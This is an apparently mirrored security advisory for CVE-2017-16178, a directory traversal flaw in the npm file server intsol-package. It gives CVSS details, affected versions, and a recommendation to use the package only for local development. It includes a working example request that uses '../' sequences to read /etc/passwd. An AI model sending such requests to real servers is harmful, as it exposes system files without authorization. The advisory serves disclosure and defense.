Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTIzd2MtdjRtZi14N3Y0

Directory Traversal in intsol-package

intsol-package is a file server.

intsol-package is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.

Example Request:

GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:localhost

and the server's Response

HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked

{contents of /etc/passwd}

Recommendation

No patch is available for this vulnerability.

It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.

Permalink: https://github.com/advisories/GHSA-23wc-v4mf-x7v4
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTIzd2MtdjRtZi14N3Y0
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: almost 6 years ago
Updated: 8 months ago


CVSS Score: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Identifiers: GHSA-23wc-v4mf-x7v4, CVE-2017-16178
References: Blast Radius: 0.0

Affected Packages

npm:intsol-package
Dependent packages: 1
Dependent repositories: 1
Downloads: 8 last month
Affected Version Ranges: <= 1.0.0
No known fixed version
All affected versions: 1.0.0